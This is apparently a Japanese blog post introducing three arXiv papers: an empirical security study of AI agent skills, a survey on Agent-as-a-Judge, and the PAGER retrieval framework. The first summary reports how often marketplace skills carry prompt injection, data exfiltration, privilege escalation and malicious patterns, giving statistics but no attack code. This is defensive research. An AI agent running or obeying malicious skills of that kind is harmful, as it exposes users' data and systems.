2026年1月21日 – arXiv最新論文の紹介

Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale

Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale [26.8]
AIエージェントフレームワークの台頭はエージェントスキル、命令を含むモジュールパッケージ、エージェント機能を動的に拡張する実行可能なコードを導入した。このアーキテクチャは強力なカスタマイズを可能にするが、スキルは暗黙の信頼と最小限の拒否によって実行され、重要なが不適合なアタックサーフェスを生み出す。 2つの主要な市場から42,447のスキルを収集し、この新興エコシステムの最初の大規模な経験的セキュリティ分析を行います。
論文参考訳（メタデータ） (Thu, 15 Jan 2026 12:31:52 GMT)
「We conduct the first large-scale empirical security analysis of this emerging ecosystem, collecting 42,447 skills from two major mar- ketplaces and systematically analyzing 31,132 using SkillScan, a multi-stage detection framework integrating static analysis with LLM-based semantic classification. Our findings reveal pervasive security risks: 26.1% of skills contain at least one vulnerability, spanning 14 distinct patterns across four categories—prompt injection, data exfiltration, privilege escalation, and supply chain risks. Data exfiltration (13.3%) and privilege escalation (11.8%) are most prevalent, while 5.2% of skills exhibit high-severity patterns strongly suggesting malicious intent.」となかなか衝撃的な報告。。

Agent-as-a-Judge

Agent-as-a-Judge [20.9]
LLM-as-a-Judgeは、スケーラブルな評価に大規模言語モデルを活用することで、AI評価に革命をもたらした。評価が複雑化し、専門化され、多段階化されるにつれて、LLM-as-a-Judgeの信頼性は、固有のバイアス、浅いシングルパス推論、現実世界の観測に対する評価の欠如によって制約されている。これはエージェント・アズ・ア・ジャッジ(Agen-as-a-Judge)への移行を触媒し、エージェント・ジャッジは計画、ツール強化された検証、マルチエージェント・コラボレーション、永続メモリを採用し、より堅牢で検証可能な、ニュアンスな評価を可能にする。
論文参考訳（メタデータ） (Thu, 08 Jan 2026 16:58:10 GMT)
「We identify and characterize the shift from LLM- as-a-Judge to Agent-as-a-Judge and summarize the agentic judges’ development trend into three progressive stages」と、最近のLLM as a judgeの進化がよく分かるサーベイ。
リポジトリはGitHub – ModalityDance/Awesome-Agent-as-a-Judge: “A Survey on Agent-as-a-Judge”

Structured Knowledge Representation through Contextual Pages for Retrieval-Augmented Generation

Structured Knowledge Representation through Contextual Pages for Retrieval-Augmented Generation [53.8]
PAGERは、RAGのためのページ駆動の自律的知識表現フレームワークである。関連文書を反復的に検索して洗練し、各スロットをポップアップさせ、最終的にコヒーレントなページを構成する。実験の結果、PAGERはすべてのRAGベースラインを一貫して上回っている。
論文参考訳（メタデータ） (Wed, 14 Jan 2026 11:44:31 GMT)]a
「PAGER first prompts the LLM to draw on its parametric knowledge to con- struct a structured cognitive outline for the target question. This outline consists of multiple slots, each representing a distinct aspect of the potentially relevant knowledge needed to answer the question. Then PAGER employs an iterative knowledge completion mechanism to iteratively retrieve supporting documents for each slot, refine them into concise knowledge evidence, and fill the corresponding slot in the page. This iterative process continues until all slots are filled with the corresponding knowledge evidence. Finally, PAGER uses this structured page as contextual knowledge to guide the LLM to answer the given question」というフレームワークの提案。Deep Researchのような動き。
リポジトリはGitHub – OpenBMB/PAGER

月	火	水	木	金	土	日
			1	2	3	4
5	6	7	8	9	10	11
12	13	14	15	16	17	18
19	20	21	22	23	24	25
26	27	28	29	30	31